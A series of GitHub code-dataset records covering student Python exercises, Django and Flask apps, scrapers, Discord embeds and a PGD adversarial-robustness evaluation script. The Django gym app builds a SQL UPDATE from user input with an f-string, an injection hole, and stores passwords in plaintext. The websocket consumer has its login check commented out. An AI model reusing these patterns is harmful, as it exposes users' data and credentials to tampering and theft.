len(word) > number:\n number = len(word)\n long_word = word\n\nprint(\"The length of the longest word is\" , number , \"letters.\")\nprint(\"The longest word is:\", long_word)\nfile.close()\n\n#2. (10pts) Write code which finds\n# The total word count AND average word length\n# in \"AliceInWonderLand.txt\"\nprint(\"Problem #2\")\n\nfile = open(\"AliceInWonderland.txt\", \"r\")\nalice = []\nfor line in file:\n words = split_line(line)\n for word in words:\n alice.append(word.lower())\nprint(\"There are\", (len(alice)), \"words in 'Alice In Wonderland'.\")\n\n# make an algorithm to find the average length\ntracking = 0\nfor item in range(len(alice)):\n tracking += len(alice[item])\n\naverage = tracking / len(alice)\naverage = round(average, 2)\nprint(\"The average number of letters in the words in 'Alice In Wonderland' is\", average ,\"letters.\")\nfile.close()\n\n\n##### CHOOSE ONE OF THE FOLLOWING TWO PROBLEMS #####\nprint(\"\\nCHOOSE\")\n#3 (13pts) How many times does \"Cheshire\" occur in\"AliceInWonderLand.txt\"?\n# How many times does \"Cat\" occur?\n# How many times does \"Cheshire\" immediately followed by \"Cat\" occur?\n# use .upper and .lower\n\n'''\nfor items in alice:\n number = 0\n for words in range(len(alice)):\n if alice[words].lower() == str(\"Cheshire\").lower():\n number += 1\nprint(number)\n'''\n\n### OR ###\n\n\n#3 (13pts)Find the most frequently occurring\n# seven letter word in \"AliceInWonderLand.txt\"\nprint(\"\\nProblem #3\")\n\nseven_let_list = []\n\nfor item in alice:\n individual = (len(item))\n if individual == 7:\n individual = item\n seven_let_list.append(individual)\nprint(seven_let_list)\n\nfor item in seven_let_list:\n pass\n #print(seven_let_list[0])\n\nprint(seven_let_list[0])\nprint(len(seven_let_list))\n\ndone = True\n'''\nwhile not done:\n random = random.randrange(len(seven_let_list))\n if seven_let_list[0] == seven_let_list[random]:\n'''\n'''\nfor item in alice:\n individual = (len(item))\n if len(item) == 7:\n for i in len(seven_let_list):\n if item == seven_let_list[item][0]:\n seven_let_list[i][1] += 1\n else:\n seven_let_list.append([item, 1])\nprint(seven_let_list)\n\nsevens = []\nfor word in alice:\n if len(word) == 7:\n for i in len(int(sevens)):\n if word == sevens[i][0]:\n sevens[i][1] += 1\n else:\n sevens.append([word, 1])\n print(sevens)\n\nfrequent = []\nfor item in seven_let_list:\n wordy = split_line(item)\n for word in wordy:\n frequent.append(word)\nprint(frequent)\n'''\n# Challenge problem (for fun). What words appear in the text of \"Alice in Wonderland\" that DO NOT occur in \"Alice Through the Looking Glass\".\n# Make a list. You can substitute this for any of the above problems.\n","repo_name":"ParkerCS/ch15-searches-elizafischer","sub_path":"ch15ProblemSet.py","file_name":"ch15ProblemSet.py","file_ext":"py","file_size_in_byte":3701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12641518165","text":"import logging\n\nfrom channels.generic.websocket import AsyncJsonWebsocketConsumer\nfrom channels.layers import get_channel_layer\n\nlogger = logging.getLogger(\"vdx_id.%s\" % __name__)\n\n\n_CHANNEL_LAYER = None\n\n\ndef get_channel():\n global _CHANNEL_LAYER\n if _CHANNEL_LAYER is None:\n _CHANNEL_LAYER = get_channel_layer()\n return _CHANNEL_LAYER\n\n\nclass NotificationConsumer(AsyncJsonWebsocketConsumer):\n channel_layer_name = \"notifications\"\n\n async def connect(self):\n # if self.scope[\"user\"].is_anonymous:\n # self.close()\n # return\n\n await self.channel_layer.group_add(\n self.channel_layer_name, self.channel_name\n )\n await self.accept()\n\n async def disconnect(self, close_code):\n await self.channel_layer.group_discard(\n self.channel_layer_name, self.channel_name\n )\n\n # Must correspond to the 'type' of the channel message\n async def task_update(self, event):\n await self.send_json(event)\n\n async def agent_task_update(self, event):\n await self.send_json(event)\n\n async def notification(self, event):\n await self.send_json(event)\n\n async def map_update(self, event):\n await self.send_json(event)\n","repo_name":"vadix-solutions/portunus-lite","sub_path":"src/web_interface/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"695903357","text":"from prettytable import PrettyTable\nimport requests\nimport json\nfrom addresses import Address\n\n\ndef xie_cheng(dcity, acity, date):\n date = date[0:4] + '-' + date[4:6] + '-' + date[6:8]\n headers = Address.headers\n city = Address.city\n url = 'https://flights.ctrip.com/itinerary/api/12808/products'\n request_payload = {\"flightWay\": \"Oneway\",\n \"army\": \"false\",\n \"classType\": \"ALL\",\n \"hasChild\": 'false',\n \"hasBaby\": 'false',\n \"searchIndex\": 1,\n \"portingToken\": \"3fec6a5a249a44faba1f245e61e2af88\",\n \"airportParams\": [\n {\"dcity\": city.get(dcity), \"acity\": city.get(acity), \"dcityname\": dcity, \"acityname\": acity,\n \"date\": date}]}\n\n # 这里传进去的参数必须为 json\n response = requests.post(url, data=json.dumps(request_payload), headers=headers)\n response = response.text\n routeList = json.loads(response)[\"data\"].get('routeList')\n table = PrettyTable([\"Airline\", \"FlightNumber\", \"DepartureDate\", \"ArrivalDate\", \"PunctualityRate\", \"LowestPrice\"])\n # print(\"123\",routeList)\n for route in routeList:\n if len(route.get('legs')) == 1:\n info = {}\n legs = route.get('legs')[0]\n flight = legs.get('flight')\n info['Airline'] = flight.get('airlineName')\n info['FlightNumber'] = flight.get('flightNumber')\n info['DepartureDate'] = flight.get('departureDate')[-8:-3]\n info['ArrivalDate'] = flight.get('arrivalDate')[-8:-3]\n info['PunctualityRate'] = flight.get('punctualityRate')\n info['LowestPrice'] = legs.get('characteristic').get('lowestPrice')\n\n table.add_row(info.values())\n\n print(dcity, '------->', acity, date)\n print(table)\n\n\nif __name__ == \"__main__\":\n dcity = input('请输入起点: ')\n acity = input('请输入终点: ')\n date = input('请输入出行日期: ')\n xie_cheng(dcity, acity, date)\n","repo_name":"Bistard/python-play-ground","sub_path":"PROJ14-Auto_Flight_Ticket_Search/sample/guo_lei_flight_tickets.py","file_name":"guo_lei_flight_tickets.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35408018527","text":"import json\nfrom typing import Optional, List\nfrom src.domain.locator import LocatorStorage, Locator\n\nclass Master(LocatorStorage):\n def __init__(self, locator: Locator):\n super().__init__(locator)\n #self.tg = self.locator.tg()\n self.kp = self.locator.kp()\n\n def findMovies(self, request: str) -> list[str]:\n response = json.loads(self.kp.getMovies(request))['docs']\n films = [x for x in response if request.lower() in x['name'].lower()]\n films.sort(key=lambda x: x['year'])\n return films\n\n#END","repo_name":"KennySuke/Tunnely_bot","sub_path":"src/managers/master.py","file_name":"master.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16419289697","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Dec 2 18:03:22 2021\r\n\r\n@author: user\r\n\"\"\"\r\nimport json\r\nfrom lxml import html\r\nimport requests\r\nfrom Docker_mySQL_Connector import insert_values,make_connection\r\nfrom datetime import datetime\r\nimport time\r\n\r\n#initialize the files\r\n\r\ndef time_files_initialize(filename):\r\n now = datetime.now()\r\n current_time = now.strftime(\"%H:%M:%S\")\r\n out_file = open(filename, \"r\") \r\n data=json.load(out_file)\r\n return current_time,data,1\r\n#load data from mySQL\r\ndef load_category_contents(mycursor,section,website_name):\r\n sql_select_Query = \"select content,time from web_sections_final where category=%s and wesite_name=%s\"\r\n tuple1 = (section,website_name)\r\n mycursor.execute(sql_select_Query,tuple1)\r\n records=mycursor.fetchall()\r\n contents=[]\r\n if len(records)>1:\r\n for i in records:\r\n contents.append(i[0])\r\n return contents,1\r\n\r\n\r\n\r\ndef get_web_DOM_tree(data,website_name):\r\n web_url=data[website_name]['url']\r\n page = requests.get(data[website_name]['url'])\r\n tree = html.fromstring(page.content)\r\n return tree,web_url,1\r\n\r\n# get the newly updated item by matching to Mysql database\r\ndef get_updated_item(latest,contents,web_url,section,website_name,mycursor):\r\n try:\r\n for item in latest:\r\n flag=0\r\n for value in contents:\r\n if (item==value):\r\n flag=1\r\n if(flag==0):\r\n print(web_url+\": \"+section+\" :Updated :\"+item)\r\n insert_values(mycursor,str(website_name),str(data[website_name]['url']),str(section),str(item),current_time)\r\n mydb.commit()\r\n except:\r\n print('error')\r\n# go to each category of the website\r\ndef section_scanner(data,website_name,contents,section,web_url,tree,mycursor):\r\n try:\r\n latest=tree.xpath(data[website_name][section])\r\n get_updated_item(latest,contents,web_url,section,website_name,mycursor)\r\n except:\r\n print('')\r\n\r\n#scan the websites\r\ndef web_scanner(mycursor,data):\r\n for website_name in data:\r\n tree,web_url,e =get_web_DOM_tree(data,website_name)\r\n for section in data[website_name]:\r\n contents,e=load_category_contents(mycursor,section,website_name)\r\n section_scanner(data,website_name,contents,section,web_url,tree,mycursor)\r\n #insert_values(mycursor,str(website_name),str(data[website_name]['url']),str(section),str(item),current_time)\r\n \r\n return 1\r\nif __name__ == \"__main__\": \r\n while(True):\r\n print('hello geek!')\r\n time.sleep(300)\r\n current_time,data,e=time_files_initialize(\"my_web_Xpath1.json\") \r\n mydb,mycursor=make_connection() \r\n web_scanner(mycursor,data)\r\n print('hey')\r\n #mydb.close()\r\n mycursor.close()\r\n","repo_name":"Sakib99/Isentia_Task","sub_path":"Final_Script.py","file_name":"Final_Script.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38895996269","text":"import graphene\nfrom home.GraphQL.types.location_type import LocationType\nfrom home.models import Location, Homestead\n\n\nclass UpdateLocationMutation(graphene.Mutation):\n class Arguments:\n name = graphene.String(required=True)\n description = graphene.String(required=True)\n primary_location = graphene.Boolean()\n homestead_id = graphene.ID()\n id = graphene.ID()\n\n location = graphene.Field(LocationType)\n\n @classmethod\n def mutate(cls, root, info, name, description, primary_location, homestead_id):\n location = Location.objects.get(pk=id)\n save_location(location, description, name, primary_location, homestead_id)\n\n return UpdateLocationMutation(location=location)\n\n\nclass CreateLocationMutation(graphene.Mutation):\n class Arguments:\n name = graphene.String(required=True)\n description = graphene.String(required=True)\n primary_location = graphene.Boolean()\n homestead_id = graphene.ID()\n\n location = graphene.Field(LocationType)\n\n @classmethod\n def mutate(cls, root, info, name, description, primary_location, homestead_id):\n location = Location()\n save_location(location, description, name, primary_location, homestead_id)\n\n return CreateLocationMutation(location=location)\n\n\ndef save_location(location, description, name, primary_location, homestead_id):\n location.name = name\n location.description = description\n location.primary_location = primary_location\n homestead = Homestead.objects.get(pk=homestead_id)\n location.homestead = homestead\n location.save()\n","repo_name":"HomesteadOS/HomesteadOS","sub_path":"home/GraphQL/mutations/location_mutations.py","file_name":"location_mutations.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"33880230246","text":"import jsonpickle\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom cartapp.cartmanager import DBCartManger\n\n# Create your views here.\ndef toOrder(request):\n cartitems = request.GET.get('cartitems','')\n # 获取支付总金额\n totalPrice = request.GET.get('totalPrice','')\n\n #判断是否登录\n if not request.session.get('user'):\n print('没有用户')\n # return HttpResponseRedirect(f'/user/login/?reflag=order&cartitems={cartitems}')\n return render(request,'login.html',{'reflag':'order','cartitems':cartitems})\n\n #反序列化cartiItems\n cartitemsList = jsonpickle.loads(cartitems)\n\n #获取默认收货地址\n user = jsonpickle.loads(request.session.get('user',''))\n addrObj = user.address_set.filter(isdefault = True)[0]\n print(addrObj)\n #获取订单内容\n cartItemObjList = [DBCartManger(user).get_cartitems(**(jsonpickle.loads(item))) for item in cartitemsList if item ]\n\n context ={\n 'cartitemsObjList':cartItemObjList,\n 'addrObj':addrObj,\n 'totalPrice':totalPrice,\n\n }\n return render(request,'order.html',context)","repo_name":"LiShaoquan2/netshop","sub_path":"orderapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1139333719","text":"import functools\nimport httpx\nfrom discord import Embed, Colour\n\nfrom psychotropic import settings\n\n\nclass DefaultEmbed(Embed):\n def __init__(self, **kwargs):\n super().__init__(\n type = 'rich',\n colour = settings.COLOUR,\n **kwargs\n )\n\n\nclass ErrorEmbed(Embed):\n def __init__(self, msg=None, info=None, **kwargs):\n msg = msg or \"Something went wrong\"\n super().__init__(\n type = 'rich',\n colour = Colour.red(),\n title = f\"Error: {msg} :(\",\n description = info,\n **kwargs\n )\n\n\ndef provider_embed_factory(provider):\n \"\"\"Factory method intended to generate provider embed classes.\"\"\"\n class ProviderEmbed(DefaultEmbed): \n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.set_author(**provider)\n \n return ProviderEmbed\n\n\ndef send_embed_on_exception(func):\n \"\"\"Decorator to send an embed if errors occurs during command\n processing. Exceptions are still raised after the embed is sent.\n \"\"\"\n @functools.wraps(func)\n async def inner(self, interaction, *args, **kwargs):\n try:\n return await func(self, interaction, *args, **kwargs)\n except httpx.RequestError:\n await interaction.followup.send(embed=ErrorEmbed(\n \"Can't connect to external server\",\n \"Maybe you should retry later?\")\n )\n raise\n except Exception:\n await interaction.followup.send(embed=ErrorEmbed())\n raise\n return inner\n","repo_name":"x-yzt/psychotropic","sub_path":"psychotropic/embeds.py","file_name":"embeds.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"31972648952","text":"from typing import List, Any\nfrom django.forms import MultiWidget, TextInput, Select, Widget\nfrom core.custom_types import Val\nfrom core.validators import ValValidator\nfrom core.models.core_tables import TypeDef\nimport json\nimport numpy as np\nfrom django.forms import (\n MultiWidget,\n TextInput,\n Select,\n MultiValueField,\n CharField,\n ChoiceField,\n)\nfrom django.utils.safestring import mark_safe\nfrom django.forms import widgets\nfrom django.conf import settings\nfrom django.urls import reverse\n\n\nclass RelatedFieldWidgetCanAdd(widgets.Select):\n def __init__(\n self, related_model, related_url=None, related_instance=None, *args, **kwargs\n ):\n super().__init__(*args, **kwargs)\n if not related_url:\n rel_to = related_model\n info = (rel_to._meta.app_label, rel_to._meta.object_name.lower())\n related_url = \"admin:%s_%s_add\" % info\n\n # Be careful that here \"reverse\" is not allowed\n self.related_base_url = related_url\n self.related_model = related_model\n self.related_instance = related_instance\n\n def render(self, name, value, *args, **kwargs):\n self.related_base_url = reverse(self.related_base_url)\n if self.related_instance is not None:\n # Add a GET parameter so that the correct value is filled\n self.related_url = (\n self.related_base_url + f\"?related_uuid={self.related_instance.uuid}\"\n )\n else:\n self.related_url = self.related_base_url\n\n output: \"List[Any]\" = [super().render(name, value, *args, **kwargs)]\n output.append(f'')\n output.append(\n f' Add another {self.related_model._meta.object_name}'\n )\n if self.choices:\n output.append(\n f\"\"\"
    \n Edit selected {self.related_model._meta.object_name}

    \n Delete selected {self.related_model._meta.object_name}\"\"\"\n )\n output.append(\n f\"\"\"\"\"\"\n )\n return mark_safe(f\"\".join(output))\n\n\nclass ValWidget(MultiWidget):\n def __init__(self, attrs={}):\n # value, unit and type\n data_types = TypeDef.objects.filter(category=\"data\")\n try:\n data_type_choices = [\n (data_type.description, data_type.description)\n for data_type in data_types\n ]\n except Exception as e:\n data_type_choices = [(\"num\", \"num\"), (\"text\", \"text\"), (\"bool\", \"bool\")]\n select_attrs = {\n \"class\": \"selectpicker\",\n \"data-style\": \"btn-primary\",\n \"data-live-search\": \"true\",\n \"placeholder\": \"DataType\",\n }\n if \"disable_select\" in attrs:\n select_attrs[\"disabled\"] = \"disabled\"\n\n widgets = [\n TextInput(attrs={\"placeholder\": \"Value\"}),\n TextInput(attrs={\"placeholder\": \"Unit\"}),\n Select(attrs=select_attrs, choices=data_type_choices),\n ]\n super().__init__(widgets, attrs)\n\n def decompress(self, value):\n if isinstance(value, Val):\n if not value.null:\n return [\n value.value,\n value.unit,\n str(value.val_type.description),\n value.value,\n ]\n\n return [None, None, None, None]\n\n def get_context(self, name, value, attrs):\n context = super().get_context(name, value, attrs)\n # table_subwidget = context[\"widget\"][\"subwidgets\"][3]\n value_text_subwidget = context[\"widget\"][\"subwidgets\"][0]\n select_subwidget = context[\"widget\"][\"subwidgets\"][2]\n\n # Checking if the selected datatype has the term 'array' in it\n if [datatype for datatype in select_subwidget[\"value\"] if \"array\" in datatype]:\n # table_subwidget[\"is_hidden\"] = False\n value_text_subwidget[\"attrs\"][\"hidden\"] = True # Hide text box\n\n list_value = json.loads(value_text_subwidget[\"value\"])\n list_value = np.array(list_value)\n num_rows = int(len(list_value) / 8)\n num_cols = 8\n\n list_value.resize(num_rows * num_cols)\n list_value = np.reshape(list_value, (num_rows, num_cols))\n\n # table_subwidget[\"rows\"] = [i + 1 for i in range(num_rows)]\n # table_subwidget[\"values\"] = list_value\n\n return context\n\n\nclass ValFormField(MultiValueField):\n widget = ValWidget()\n\n def __init__(self, *args, **kwargs):\n errors = self.default_error_messages.copy()\n if \"error_messages\" in kwargs:\n errors.update(kwargs[\"error_messages\"])\n data_types = TypeDef.objects.filter(category=\"data\")\n try:\n data_type_choices = [\n (data_type.description, data_type.description)\n for data_type in data_types\n ]\n except Exception as e:\n data_type_choices = [(\"num\", \"num\"), (\"text\", \"text\"), (\"bool\", \"bool\")]\n fields = (\n CharField(\n error_messages={\n \"incomplete\": \"Must enter a value\",\n }\n ),\n CharField(required=False),\n ChoiceField(choices=data_type_choices, initial=\"num\"),\n )\n if \"max_length\" in kwargs:\n kwargs.pop(\"max_length\")\n\n super().__init__(fields, *args, **kwargs)\n\n def compress(self, data_list):\n if data_list:\n value, unit, val_type_text = data_list\n val_type = TypeDef.objects.get(category=\"data\", description=val_type_text)\n val = Val(val_type, value, unit)\n return val\n return Val(None, None, None, null=True)\n\n def validate(self, value):\n # print(f\"validating {value}\")\n validator = ValValidator()\n validator(value)\n","repo_name":"darkreactions/ESCALATE","sub_path":"escalate/core/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":7145,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"19"} +{"seq_id":"11480855799","text":"from re import X\nimport sqlite3 as sql\nfrom django.shortcuts import render, redirect\nfrom .models import comentario, register_data\nfrom django.http import HttpResponse\n\n\n# Create your views here.\ndef index(request):\n com = comentario.objects.all()\n return render(request, \"index.html\", {\"texto\": com})\n\n\ndef login(request):\n return render(request, \"login.html\")\n\n\ndef crearcuenta(request):\n return render(request, \"register.html\")\n\ndef redireccionarlogin(request):\n nombre = request.POST[\"usuario\"]\n contraseña = request.POST[\"contraseña\"]\n conf_contraseña = request.POST[\"confirmar\"]\n if contraseña == conf_contraseña:\n usuario = register_data(nombre_usuario = nombre, contraseña_usuario = contraseña, verificacion_contraseña = conf_contraseña)\n else:\n return render(request, \"error.html\")\n \n\n d_b = \"registro.db\"\n coneccion = sql.connect(d_b)\n cursor = coneccion.cursor()\n cursor.execute(\"SELECT * FROM sheshagym_register_data\")\n x = cursor.fetchall()\n template = \"\"\"\n
    \n

    Registro ocupado

    \n

    El usuario ya existe en el sistema

    \n

    Vuelva e intente de nuevo

    \n \n
    \n \"\"\"\n for i in x:\n if nombre in i:\n print(\"yes\")\n return HttpResponse(template)\n \n else:\n usuario.save()\n return render(request, \"login.html\", {\"usuarios\": usuario})\n\n \n \n\n\ndef redireccionindex(request):\n nombre = request.POST[\"usuario\"]\n contraseña = request.POST[\"contraseña\"]\n d_b = \"registro.db\"\n coneccion = sql.connect(d_b)\n cursor = coneccion.cursor()\n cursor.execute(\"SELECT * FROM sheshagym_register_data\")\n users = cursor.fetchall()\n for user in users:\n if nombre in user:\n print(\"yes c\")\n if contraseña in user:\n print(\"yes b\")\n return render(request, \"index.html\", {\"usuario\": user,\"user\": nombre})\n else:\n template = \"\"\"\n
    \n

    login invalido

    \n

    El usuario o contaseña esta mal

    \n

    Vuelva e intente de nuevo

    \n \n
    \n \"\"\"\n return HttpResponse(template)\n\n\ndef eliminardatos(request, id_table):\n eliminar = comentario.objects.get(id=id_table)\n eliminar.delete()\n return redirect(\"index\")\n\ndef cogerdatos(request):\n texto = comentario(texto = request.POST[\"texto_usuario\"])\n texto.save()\n return redirect(\"index\")\n\n\ndef editpage(request, id_table):\n eliminar = comentario.objects.get(id=id_table)\n print(eliminar)\n return render(request, \"edit.html\", {\"id\": eliminar}) \n\n\ndef cogerdatosnuevos(request, id_table):\n eliminar = comentario.objects.get(id=id_table)\n print(eliminar.id)\n d_b = \"registro.db\"\n coneccion = sql.connect(d_b)\n cursor = coneccion.cursor()\n nuevodato= comentario(texto = request.POST[\"nuevo_dato\"])\n cursor.execute(f\"UPDATE sheshagym_comentario SET texto = '{nuevodato.texto}' where id = {eliminar.id}\")\n coneccion.commit()\n coneccion.close()\n # nuevodato.save()\n print(nuevodato)\n return redirect(\"index\")\n\n\n\n \n\n\n\n\n \n \n ","repo_name":"LarsSong1/SHESHA-GYM-web-CRUD","sub_path":"sheshagym/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23954837809","text":"def observed():\n observations = []\n for index in range(3):\n observations.append(input(\"Please enter a observation:\"))\n return observations\n\ndef run():\n print(\"Counting observations....\")\n captured_observations = observed()\n empty_set = set()\n for value in captured_observations:\n empty_set.add((value,captured_observations.count(value)))\n\n for city in empty_set:\n print(f\"{city[0]} observed{city[1]}\")\n\nif __name__ == \"__main__\":\n run()\n\n\n\n","repo_name":"DAghaSolent/com411","sub_path":"data/sets/set_from_list.py","file_name":"set_from_list.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37676777809","text":"\nimport torch.nn.functional as F\nfrom tqdm import tqdm, trange\nimport torch\n\n\ndef set_robustness_attack_config(attack_norm, attack_epsilon, attack_alpha, attack_iters, attack_random_restarts,\n targeted):\n if attack_norm == 'l2':\n constraint = '2'\n elif attack_norm == 'linf':\n constraint = 'inf'\n elif attack_norm == 'none':\n constraint = 'unconstrained'\n elif attack_norm == 'fourier':\n constraint = 'fourier'\n else:\n constraint = 'unconstrained'\n attack_kwargs = {\n 'constraint': constraint, # use L2-PGD\n 'eps': attack_epsilon, # L2 radius around original image\n 'step_size': attack_alpha,\n 'iterations': attack_iters,\n 'targeted': targeted,\n 'random_restarts': attack_random_restarts,\n 'do_tqdm': False,\n }\n return attack_kwargs\n\n\ndef conduct_pgd(attack_iters_lst, attack_epsilon_lst, attack_norm_lst, attack_alpha_lst, pgd_random_restarts,\n test_attack_loader, augmenter, attack_targeted):\n device = augmenter.device\n attack_losses = {}\n attack_accs = {}\n for attack_norm_i in trange(len(attack_norm_lst), desc='attack norm loop'):\n attack_norm = attack_norm_lst[attack_norm_i]\n attack_epsilon_lst_i = attack_epsilon_lst[attack_norm_i]\n attack_alpha_lst_i = attack_alpha_lst[attack_norm_i]\n\n attack_losses[attack_norm] = {}\n attack_accs[attack_norm] = {}\n for attacks_iter_i in trange(len(attack_iters_lst), desc='attack iter loop'):\n attack_iter = attack_iters_lst[attacks_iter_i]\n attack_losses[attack_norm][attack_iter] = {}\n attack_accs[attack_norm][attack_iter] = {}\n for attacks_eps_i in trange(len(attack_epsilon_lst_i),\n desc='attack epsilon loop with {} iter'.format(\n attack_iter)):\n attack_epsilon = attack_epsilon_lst_i[attacks_eps_i]\n attack_alpha = attack_alpha_lst_i[attacks_eps_i]\n robustness_attack_config = set_robustness_attack_config(attack_norm,\n attack_epsilon,\n attack_alpha,\n attack_iter,\n pgd_random_restarts,\n attack_targeted)\n print('\\nStart attacking with epsilon : {}\\talpha : {} \\t iter : {}...'.format(\n attack_epsilon,\n attack_alpha,\n attack_iter))\n\n count_total = 0.\n correct_total = 0.\n detached_loss_total = 0.\n\n # for sorted_ix, batch in enumerate(tqdm(test_attack_loader, desc='attack loop')):\n for test_i, batch in enumerate(\n tqdm(test_attack_loader, desc='attack loop (val)')):\n # setting model to eval mode\n augmenter.set_eval()\n\n X, y = batch\n if attack_targeted:\n # shift the labels up.\n y_target = y + 1\n y_target %= (test_attack_loader.dataset.classes.__len__() - 1)\n else:\n y_target = y\n X, y, y_target = X.to(device), y.to(device), y_target.to(device)\n X_adv = augmenter.adv_example(X, y_target, robustness_attack_config)\n\n # calc the loss on adv. examples\n with torch.no_grad():\n outputs = augmenter.eval_mode_pred(X_adv)\n val_loss = augmenter.calc_eval_loss_from_output(outputs, y)\n\n _, predictions = torch.max(outputs.data, 1)\n count_total += y.size(0)\n detached_loss_total += val_loss\n correct_total += predictions.eq(y.data).sum().float().cpu().numpy().item()\n\n attack_loss = detached_loss_total / count_total\n attack_acc = 100. * correct_total / count_total\n\n print('Finished attacking with epsilon : {} \\t iter : {}...\\n'.format(\n attack_epsilon,\n attack_iter))\n print('Attack Test Loss: {:.5f}, Acc: {:.5f}'.format(attack_loss, attack_acc))\n\n attack_losses[attack_norm][attack_iter][attack_epsilon] = attack_loss\n attack_accs[attack_norm][attack_iter][attack_epsilon] = attack_acc\n\n return attack_losses, attack_accs\n","repo_name":"eghbalz/rethink_da_for_ar","sub_path":"attacks/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18286727882","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\nEsqueleto de agente usando los servicios web de Flask\n\n/comm es la entrada para la recepcion de mensajes del agente\n/Stop es la entrada que para el agente\n\nTiene una funcion AgentBehavior1 que se lanza como un thread concurrente\n\nAsume que el agente de registro esta en el puerto 9000\n\n\"\"\"\nfrom __future__ import print_function\nfrom multiprocessing import Process, Queue\nimport socket\nfrom string import Template\n\nfrom rdflib import Namespace, Graph, RDF\nfrom rdflib.namespace import FOAF\nimport uuid\nfrom flask import Flask, request, render_template\nimport sys\nimport constants.FIPAACLPerformatives as performatives\nfrom AgentUtil.ACLMessages import build_message, send_message\nfrom AgentUtil.FlaskServer import shutdown_server\nfrom AgentUtil.OntoNamespaces import ACL\nfrom AgentUtil.Agent import Agent\nimport requests\nimport os\n\nimport logging\nlogging.basicConfig(level=logging.DEBUG)\n\nimport constants.OntologyConstants as OntologyConstants\nfrom orderRequest import OrderRequest\nfrom rdflib.term import Literal\n\n\n# Configuration stuff\nhostname = '0.0.0.0'\nport = 9015\n\nimport os\ndirectory_hostname = os.environ['DIRECTORY_HOST'] or hostname\n\nagn = Namespace(OntologyConstants.ONTOLOGY_URI)\n\n# Contador de mensajes\nmss_cnt = 0\n\n# Datos del Agente\n\nExternalSellerAgent = Agent('SellerExternalAgent',\n agn.SellerExternalAgent,\n 'http://%s:%d/comm' % (hostname, port),\n 'http://%s:%d/Stop' % (hostname, port))\n\n# Directory agent address\nDirectoryAgent = Agent('DirectoryAgent',\n agn.Directory,\n 'http://%s:9000/Register' % directory_hostname,\n 'http://%s:9000/Stop' % directory_hostname)\n\n\n# Global triplestore graph\ndsgraph = Graph()\n\ncola1 = Queue()\n\n# Flask stuff\napp = Flask(__name__, template_folder='./templates')\n\n\ndef add_product_to_graph(g, product_id, product_name, product_description, weight_grams, brand, price, category, seller):\n g.add((agn[product_id], agn.product_name, Literal(product_name)))\n g.add((agn[product_id], agn.product_id, Literal(product_id)))\n g.add((agn[product_id], agn.product_description, Literal(product_description)))\n g.add((agn[product_id], agn.weight_grams, Literal(weight_grams)))\n g.add((agn[product_id], agn.brand, Literal(brand)))\n g.add((agn[product_id], agn.price_eurocents, Literal(price)))\n g.add((agn[product_id], agn.category, Literal(category)))\n g.add((agn[product_id], agn.seller, Literal(seller)))\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef welcome():\n if request.method == 'GET':\n return render_template('external_seller.html')\n\n message = Graph()\n\n product_id = uuid.uuid4()\n add_product_to_graph(\n message,\n product_id,\n request.form['product_name'],\n request.form['product_description'],\n int(request.form['weight_grams']),\n request.form['brand'],\n int(int(request.form['price_euros']) / 100),\n request.form['category'],\n request.form['seller']\n )\n\n message.add((agn[product_id], RDF.type, Literal(OntologyConstants.ACTION_ADD_EXT)))\n\n vendor_agent = ExternalSellerAgent.find_agent(DirectoryAgent, agn.VendorAgent)\n\n msg = build_message(\n message,\n perf=Literal(performatives.REQUEST),\n sender=ExternalSellerAgent.uri,\n receiver=vendor_agent.uri,\n msgcnt=get_new_msg_count(),\n content=agn[product_id]\n )\n\n send_message(msg, vendor_agent.address)\n\n return render_template('external_seller.html')\n\ndef get_new_msg_count():\n global mss_cnt\n mss_cnt += 1\n return mss_cnt\n\n@app.route(\"/comm\")\ndef comunicacion():\n \"\"\"\n Entrypoint de comunicacion\n \"\"\"\n return\n\n\n@app.route(\"/Stop\")\ndef stop():\n \"\"\"\n Entrypoint que para el agente\n\n :return:\n \"\"\"\n tidyup()\n shutdown_server()\n return \"Parando Servidor\"\n\n\ndef tidyup():\n \"\"\"\n Acciones previas a parar el agente\n\n \"\"\"\n pass\n\n\ndef agentbehavior1(cola):\n \"\"\"\n Un comportamiento del agente\n\n :return:\n \"\"\"\n\n ExternalSellerAgent.register_agent(DirectoryAgent)\n\n pass\n\n\nif __name__ == '__main__':\n # Ponemos en marcha los behaviors\n ab1 = Process(target=agentbehavior1, args=(cola1,))\n ab1.start()\n\n # Ponemos en marcha el servidor\n app.run(host=hostname, port=port, debug=True)\n\n # Esperamos a que acaben los behaviors\n ab1.join()\n print('The 